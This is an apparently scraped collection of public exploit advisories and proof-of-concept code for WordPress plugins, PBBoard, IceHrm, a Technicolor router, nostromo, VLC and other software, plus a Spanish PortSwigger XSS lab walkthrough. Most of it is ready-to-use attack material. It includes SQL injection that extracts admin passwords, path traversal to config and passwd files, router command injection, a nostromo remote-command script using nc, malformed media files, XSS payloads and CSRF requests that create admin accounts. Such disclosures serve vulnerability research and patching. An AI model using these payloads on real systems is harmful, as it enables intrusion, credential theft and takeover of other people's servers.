HireHackking

# Exploit Title: Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection # Date: 29-10-2014 # Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek # Software Link: https://downloads.wordpress.org/plugin/cart66-lite.1.5.1.17.zip # Category: webapps 1. Description Cart66Ajax::shortcodeProductsTable() is accessible for every registered user. $postId is not escaped correctly (only html tags are stripped). File: cart66-lite\models\Cart66Ajax.php public static function shortcodeProductsTable() { global $wpdb; $prices = array(); $types = array(); $postId = Cart66Common::postVal('id'); $product = new Cart66Product(); $products = $product->getModels("where id=$postId", "order by name"); $data = array(); } http://security.szurek.pl/cart66-lite-wordpress-ecommerce-15117-blind-sql-injection.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register): <form action="http://wordpress-install/wp-admin/admin-ajax.php" method="post"> <input type="hidden" name="action" value="shortcode_products_table"> Blind SQL Injection: <input type="text" name="id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM wp_users WHERE ID = 1) -- "> <input value="Hack" type="submit"> </form> This SQL will check if first password character user ID=1 is $. If yes, it will sleep 5 seconds. 3. Solution: Update to version 1.5.2 https://wordpress.org/plugins/cart66-lite/changelog/ https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Stored XSS into HTML context with nothing encoded”. Para resolver el laboratorio tenemos que ejecutar la función alert en un comentario de un post. Cuando abrimos el laboratorio lo primero que tenemos que hacer es dirigirnos a un post cualquiera: Dentro del post, encontramos lo siguiente: Como podemos ver tenemos la opción de dejar un comentario, y distintos campos a rellenar. Por lo que nosotros simplemente vamos a hacerle caso, y vamos a rellenar todos los campos, eso si, en el campo del comentario, colocaremos un pequeño código JavaScript que nos ejecute un alert: Con todos los campos rellenados, simplemente enviamos el comentario y habremos resuelto el laboratorio: Para ver que ha ocurrido, vamos a volver al post done hemos escrito nuestro comentario: Y como vemos, al entrar en el post, se nos ejecuta el código que habíamos escrito en el campo de comentario. Acabamos de explotar un Stored XSS.

# Exploit Title: Wordpress CodeArt Google MP3 Player plugin - File Disclosure Download # Google Dork: inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file= # Date: 02/12/2014 # Exploit Author: QK14 Team # Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/ # Software Link: https://wordpress.org/plugins/google-mp3-audio-player/ # Version: 1.0.11 # http://wordpressa.quantika14.com/repository/index.php?id=14 Descripci�n: Este plugin es vulnerable a File Disclosure Download. Gracias a esta vulnerabilidad, un usuario podr� descargar el archivo de configuraci�n config.php y extraer de �l los datos de acceso a la Base de Datos. POF: localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo ad.php?file=../../../wp-config.php

Product: Wireless N ADSL 2/2+ Modem Router Firmware Version : V2.05.C29GV Modem Type : ADSL2+ Router Modem Vendor : Technicolor Model: DT5130 Bugs: 1- Unauth Xss - CVE-2014-9142 user=teste&password=teste& userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login 2- Arbitrari URL redirect - CVE-2014-9143 failrefer=http://blog.dclabs.com.br&login=Login&password= pass&refer=/index.html&user=1&userlevel=15 3- Command Injection in ping field - CVE-2014-9144 setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE -- Ewerson Guimaraes (Crash) Pentester/Researcher DcLabs / Ibliss Security Team www.dclabs.com.br / www.ibliss.com.br

source: https://www.securityfocus.com/bid/46864/info Trend Micro WebReputation API is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass the filter included in the download mechanism. Successful exploits may cause victims to download malicious files onto affected computers. This issue affects WebReputation API 10.5; other versions may also be vulnerable. http://www.example.com/dist/nmap-5.51-setup.exe?

# Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability # Date: 12/02/2014 # Author: Robert Cooper (robertc[at]areyousecure.net) # Software Link: http://www.guruperl.net/products/awppro/ # Tested on: [Linux/Windows 7] # Vulnerable Parameter: group_id= ############################################################## PoC: http://server/cgi/client.cgi?act=list_zone&group_id=1' http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client-- (Passwords are stored in plaintext) ############################################################## http://www.areyousecure.net

source: https://www.securityfocus.com/bid/46868/info VLC Media Player is prone to a denial-of-service vulnerability. Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. VLC Media Player 1.0.5 is vulnerable; other versions may also be affected. #!/usr/bin/perl ### # Title : VLC media player v1.0.5 (.ape) Local Crash PoC # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : VLC media player Just Crashed # Tested on : Windows XP SP3 Fran�ais # Target : VLC media player v1.0.5 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Usage : 1 - Creat APE file ( Monkey's Audio Format ) # => 2 - Open APE file With VLC 1.0.5 # => 3 - Crashed !!! # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print "\n\n"; print " |===========================================================|\n"; print " |= [!] Name : VLC media player v1.0.5 (Monkey's File) =|\n"; print " |= [!] Exploit : Local Crash PoC =|\n"; print " |= [!] Author : KedAns-Dz =|\n"; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n"; print " |===========================================================|\n"; sleep(2); print "\n"; # Creating ... my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB print file $PoC; print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! "; close(file); #================[ Exploited By KedAns-Dz * HST-Dz * ]========================= # Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX # Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah # Messas Secondary School - Ain mlilla - 04300 - Algeria ] , # Greets All My Friends (cit� 1850 logts - HassiMessaouD - 30008 -Algeria ) , # ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers . # ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker . #===============================================================================

source: https://www.securityfocus.com/bid/46880/info nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data. An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges. nostromo versions prior to 1.9.4 are affected. #!/bin/sh ###################################### # # # RedTeam Pentesting GmbH # # kontakt@redteam-pentesting.de # # http://www.redteam-pentesting.de # # # ###################################### if [ $# -lt 3 ]; then echo "Usage: $(basename $0) HOST PORT COMMAND..." exit 2 fi HOST="$1" PORT="$2" shift 2 ( \ echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \ echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \ echo "$@ 2>&1" \ ) | nc "$HOST" "$PORT" \ | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'

source: https://www.securityfocus.com/bid/46885/info SugarCRM is prone to an information-disclosure vulnerability because it fails to restrict access to certain application data. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. http://www.example.org/sugarcrm/index.php?module=Accounts&action=ShowDuplicates http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates

source: https://www.securityfocus.com/bid/46887/info Monkeyâ??s Audio is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition. #!/usr/bin/perl ### # Title : Monkey's File Audio (All MPlayers) Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Overflow & Crash's # Tested on : Windows XP SP3 Fran?ais # Target : All Media Players ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # File Home : (http://www.monkeysaudio.com) # Error's Detected : # Media Player Classic v6.4.9.1 [MonkeySource.ax !0x020451a6()!] >> http://1337day.com/exploits/15581 || By KedAns-Dz # JetAudio v5.1.5.2 [JFACMDec.dll !0x02FA1BBD()!] >> http://packetstormsecurity.org/files/view/99200/jetaudio5152ape-overflow.txt || By KedAns-Dz # KMPlayer 2.9.3 [MACDec.dll !0x??????()!] >> http://packetstormsecurity.org/files/view/99190/kmplayerape-overflow.txt || By KedAns-Dz # VLC media player v1.0.5 [axvlc.dll !0x??????()!] >> http://1337day.com/exploits/15595 || By KedAns-Dz # QuickTime Player [Not Detected !!] ' Because Can not Read (APE) Files Format # RealPlayer [Not Detected !!] ' Because Can not Read (APE) Files Format # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print "\n\n"; print " |======================================================|\n"; print " |= [!] Name : Monkey's File Audio (.ape) All Players =|\n"; print " |= [!] Exploit : Stack Buffer Overflow =|\n"; print " |= [!] Author : KedAns-Dz =|\n"; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n"; print " |======================================================|\n"; sleep(2); print "\n"; # Creating ... my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header (16 bytes) open(file , ">", "Kedans.ape"); # Evil File APE (4.0 KB) print file $PoC; print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! "; close(file); #================[ Exploited By KedAns-Dz * HST-Dz * ]========================= # Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX # Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah # Messas Secondary School - Ain mlilla - 04300 - Algeria ] , # Greets All Bad Boys (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) , # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) #===========================================================================

source: https://www.securityfocus.com/bid/46896/info AplikaMedia CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/page_info.php?id_brt=[Sql_injection]

source: https://www.securityfocus.com/bid/46888/info Wikiwig is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. Wikiwig 5.01 is vulnerable; other versions may also be affected. http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +------------------------------------------------------------------------------+ | Packet Storm Advisory 2014-1204-1 | | http://packetstormsecurity.com/ | +------------------------------------------------------------------------------+ | Title: Offset2lib: Bypassing Full ASLR On 64bit Linux | +--------------------+---------------------------------------------------------+ | Release Date | 2014/12/04 | | Advisory Contact | Packet Storm (advisories@packetstormsecurity.com) | | Researchers | Hector Marco and Ismael Ripoll | +--------------------+---------------------------------------------------------+ | System Affected | 64 bit PIE Linux | | Classification | 1-day | +--------------------+---------------------------------------------------------+ +----------+ | OVERVIEW | +----------+ The release of this advisory provides exploitation details in relation a weakness in the Linux ASLR implementation. The problem appears when the executable is PIE compiled and it has an address leak belonging to the executable. These details were obtained through the Packet Storm Bug Bounty program and are being released to the community. +------------------------------------------------------------------------------+ +---------+ | DETAILS | +---------+ An attacker is able to de-randomize all mmapped areas (libraries, mapped files, etc.) by knowing only an address belonging to the application and the offset2lib value. +------------------------------------------------------------------------------+ +------------------+ | PROOF OF CONCEPT | +------------------+ The proof of concept exploit code is available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35472.tgz http://packetstormsecurity.com/files/129398 +------------------------------------------------------------------------------+ +---------------+ | RELATED LINKS | +---------------+ http://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html +------------------------------------------------------------------------------+ +----------------+ | SHAMELESS PLUG | +----------------+ The Packet Storm Bug Bounty program gives researchers the ability to profit from their discoveries. You can get paid thousands of dollars for one day and zero day exploits. Get involved by contacting us at getpaid@packetstormsecurity.com or visit the bug bounty page at: http://packetstormsecurity.com/bugbounty/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAlSBA04ACgkQrM7A8W0gTbG0jwCdH5CHOIDO9ELRcrPhQmf5FF4z TgQAn2zuwadnWdMueC8gUQPT5gCmrQyp =iegV -----END PGP SIGNATURE-----

Vulnerability title: SQL Injection in PBBoard CMS CVE: CVE-2014-9215 CMS: PBBoard Vendor: Power bulletin board - http://www.pbboard.info/ Product: http://sourceforge.net/projects/pbboard/files/PBBoard_v3.0.1/PBBoard_v3.0.1.zip/download Affected version: Version 3.0.1 (updated on 13/09/2014) and before. Fixed version: Version 3.0.1 (updated on 28/11/2014) Google dork: intext:Powered By PBBoard Reported by: Tran Dinh Tien - tien.d.tran@itas.vn Credits to ITAS Team - www.itas.vn :: DESCRITION :: Multiple SQL injection vulnerabilities has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection. :: DETAILS :: Attack vector Link 1: POST /index.php?page=register&checkemail=1 HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://server/index.php?page=register&index=1&agree=1 Content-Length: 29 Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache email=<SQL Injection Here>&ajax=1 Link 2: POST /index.php?page=forget&start=1 HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://server/index.php?page=forget&index=1 Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 52 code=0ae4e&email=<SQL Injection Here>&submit_forget=Save link 3: POST /index.php?page=forget&send_active_code=1 HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://server/index.php?page=forget&active_member=1&send_active_code=1 Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 57 code=13709&email=<SQL Injection Here>&submit_active_code=Save :: CODE DETAIL :: - Vulnerable parameter: email - Vulnerable file: includes/functions.class.php - Vulnerable function: CheckEmail($email) - Vulnerable code: function CheckEmail($email) { return preg_match('#^[a-z0-9.!\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\s\'"<>@,;]+\.+[a-z]{2,6}))$#si', $email) ? true : false; } - Fix code: function CheckEmail($email) { // First, we check that there's one @ symbol, and that the lengths are right if (!preg_match("/^[^@]{1,64}@[^@]{1,255}$/", $email)) { // Email invalid because wrong number of characters in one section, or wrong number of @ symbols. return false; } if (@strstr($email,'"') or @strstr($email,"'") or @strstr($email,'>') or @strstr($email,'<') or @strstr($email,'*') or @strstr($email,'%') or @strstr($email,'$') or @strstr($email,'#') or @strstr($email,'+') or @strstr($email,'^') or @strstr($email,'&') or @strstr($email,',') or @strstr($email,'~') or @strstr($email,'!') or @strstr($email,'{') or @strstr($email,'}') or @strstr($email,'(') or @strstr($email,')') or @strstr($email,'/')) { return false; } // Split it into sections to make life easier $email_array = explode("@", $email); $local_array = explode(".", $email_array[0]); for ($i = 0; $i < sizeof($local_array); $i++) { if (!preg_match("/^(([A-Za-z0-9!#$%&'*+\/=?^_`{|}~-][A-Za-z0-9!#$%&'*+\/=?^_`{|}~\.-]{0,63})|(\"[^(\\|\")]{0,62}\"))$/", $local_array[$i])) { return false; } } if (!preg_match("/^\[?[0-9\.]+\]?$/", $email_array[1])) { // Check if domain is IP. If not, it should be valid domain name $domain_array = explode(".", $email_array[1]); if (sizeof($domain_array) < 2) { return false; // Not enough parts to domain } for ($i = 0; $i < sizeof($domain_array); $i++) { if (!preg_match("/^(([A-Za-z0-9][A-Za-z0-9-]{0,61}[A-Za-z0-9])|([A-Za-z0-9]+))$/", $domain_array[$i])) { return false; } } } return true; } :: SOLUTION :: Version 3.0.1 (updated on 28/11/2014) :: DISCLOSURE :: - 11/27/2014: Inform the vendor - 11/28/2014: Vendor confirmed - 11/28/2014: Vendor releases patch - 12/01/2014: ITAS Team publishes information ::COPYRIGHT:: Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn). :: DISCLAIMER :: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. :: REFERENCE :: - http://www.itas.vn/news/ITAS-Team-discovered-SQL-Injection-in-PBBoard-CMS-68.html - https://www.youtube.com/watch?v=AQiGvH5xrJg

source: https://www.securityfocus.com/bid/47006/info Perl is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users. #!/usr/bin/perl my @x = ("A=B","AAAA=/"); utf8::upgrade $_ for @x; $x[1] =~ s{/\s*$}{}; for (@x) { m{^([^=]+?)\s*=.+$}; }

 IceHrm <=7.1 Multiple Vulnerabilities Vendor: IceHRM Product web page: http://www.icehrm.com Affected version: <= 7.1 Summary: IceHrm is Human Resource Management web software for small and medium sized organizations. The software is written in PHP. It has community (free), commercial and hosted (cloud) solution. Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities including Local File Inclusion, Cross-Site Scripting, Malicious File Upload, Cross-Site Request Forgery and Code Execution. Tested on: Apache/2.2.15 (Unix) PHP/5.3.3 MySQL 5.1.73 Vulnerabilities discovered by Stefan 'sm' Petrushevski @zeroscience Advisory ID: ZSL-2014-5215 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php 01.12.2014 --- 1. Local File Inclusion (LFI) ##################################################### File: app/index.php Vulnerable code: ---- snip ---- include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php'; app/?g=../&n=../../../../etc/passwd%00 ---- snip ---- Proof of Concept (PoC): http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00 Severity: CRITICAL ##################################################### 2. Local File Inclusion (LFI) ##################################################### File: service.php Vulnerable code: ---- snip ---- if($action == 'download'){ $fileName = $_REQUEST['file']; $fileName = CLIENT_BASE_PATH.'data/'.$fileName; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($fileName)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($fileName)); ob_clean(); flush(); readfile($fileName); ---- snip ---- Proof of Concept (PoC): http://zsltest/icehrm/app/service.php?a=download&file=../config.php Severity: CRITICAL ##################################################### 3. Malicious File Upload / Code Execution ##################################################### File: fileupload.php Vulnerable code: ---- snip ---- //Generate File Name $saveFileName = $_POST['file_name']; if(empty($saveFileName) || $saveFileName == "_NEW_"){ $saveFileName = microtime(); $saveFileName = str_replace(".", "-", $saveFileName); } $file = new File(); $file->Load("name = ?",array($saveFileName)); // list of valid extensions, ex. array("jpeg", "xml", "bmp") $allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg"); // max file size in bytes $sizeLimit =MAX_FILE_SIZE_KB * 1024; $uploader = new qqFileUploader($allowedExtensions, $sizeLimit); $result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName); // to pass data through iframe you will need to encode all html tags if($result['success'] == 1){ $file->name = $saveFileName; $file->filename = $result['filename']; $file->employee = $_POST['user']=="_NONE_"?null:$_POST['user']; $file->file_group = $_POST['file_group']; $file->Save(); $result['data'] = CLIENT_BASE_URL.'data/'.$result['filename']; $result['data'] .= "|".$saveFileName; $result['data'] .= "|".$file->id; } ---- snip ---- Proof of Concept (PoC) method: 1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder. Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt 2. Create a malicious file (php shell) save it with .txt extension 3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt. 4. Access the file – http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code. PoC example: 1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1 2. xxx.txt contents: <?php phpinfo(); ?> 3. Upload the filename 4. Access the file: Severity: CRITICAL ##################################################### 4. Cross-Site Scripting (XSS) ##################################################### File: login.php Vulnerable code: ---- snip ---- <script type="text/javascript"> var key = ""; <?php if(isset($_REQUEST['key'])){?> key = '<?=$_REQUEST['key']?>'; key = key.replace(/ /g,"+"); <?php }?> ---- snip ---- Proof of Concept (PoC): http://zsltest/icehrm/app/login.php?key=';</script><script>alert(‘zsl’);</script> Severity: MEDIUM ##################################################### 5. Cross-Site Scripting (XSS) ##################################################### File: fileupload_page.php Vulnerable code: ---- snip ---- <div id="upload_form"> <form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data"> <input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/> <input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/> <input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/> <label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file" type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input> … ---- snip ---- Vulnerable parameters: id, file_group, user, msg Proof of Concept (PoC): http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(‘zsl’)%3C/script%3E Severity: MEDIUM ##################################################### 6. Information Disclosure / Leaking Sensitive User Info ##################################################### Users’/employees’ profile images are easily accessible in the ‘data’ folder. Proof of Concept (PoC): http://192.168.200.119/icehrm/app/data/profile_image_1.jpg http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id Severity: LOW ##################################################### 7. Cross-Site Request Forgery (CSRF) ##################################################### All forms are vulnerable to CSRF. Documents library: http://localhost/icehrm/app/service.php POST document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument Personal info: http://localhost/icehrm/app/service.php GET t=Employee a=ca sa=get mod=modules=employees req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"} Add new admin user: http://localhost/icehrm/app/service.php POST username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User Change password of user: http://localhost/icehrm/app/service.php? GET t=User a=ca sa=changePassword mod=admin=users req={"id":5,"pwd":"newpass"} Add/edit modules: http://localhost/icehrm/app/service.php POST t=Module&a=get&sm=%7B%7D&ft=&ob= Severity: LOW #####################################################

############################################################################## # Exploit Title : PBBoard CMS Stored xss vulnerability # Author : Manish Kishan Tanwar # Vendor : http://www.pbboard.info/ # version affected: all # Date : 7/12/2014 # Discovered @ : INDISHELL Lab # Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti # email : manish.1046@gmail.com ############################################################################## //////////////////////// /// Overview: //////////////////////// Program PBBoard is interactive Forum management program Dialogic Free classified software Free and open source. /////////////////////////////// // Vulnerability Description: /////////////////////////////// Stored xss vulnerability exist in "send private message" module, a user can send xss crafted private message to other user, and when reciever will open the message xss payload will execute ////////////////////////////// /// Proof of Concept: - ////////////////////////////// go to "inbox", click "compose message" type username, title and message body , intercept the request and change the content of "text" parameter with xss payload when reciever will open the message, xss payload will execute Proof image:- http://oi57.tinypic.com/112d5cx.jpg ////////////////////// ///Demo POC Request/// ////////////////////// POST /PBBoard_v3.0.1/index.php?page=pm_send&send=1&start=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/PBBoard_v3.0.1/index.php?page=pm_send&send=1&index=1&username=ica Cookie: PowerBB_lastvisit=1417951132; PowerBB_username=ica; PowerBB_password=8a2d334536b2f4146af8cf46acd85110; security_level=0;PHPSESSID=thouojqch98pigioioepn8n2h1 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------147872036312473 Content-Length: 670 -----------------------------147872036312473 Content-Disposition: form-data; name="to[]" ica -----------------------------147872036312473 Content-Disposition: form-data; name="title" hi -----------------------------147872036312473 Content-Disposition: form-data; name="text" hii</div><font color=red><body onload="prompt( String.fromCharCode(120,115,115,32,116,101,115,116));">// -----------------------------147872036312473 Content-Disposition: form-data; name="icon" look/images/icons/i1.gif -----------------------------147872036312473 Content-Disposition: form-data; name="insert" Save -----------------------------147872036312473-- --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3

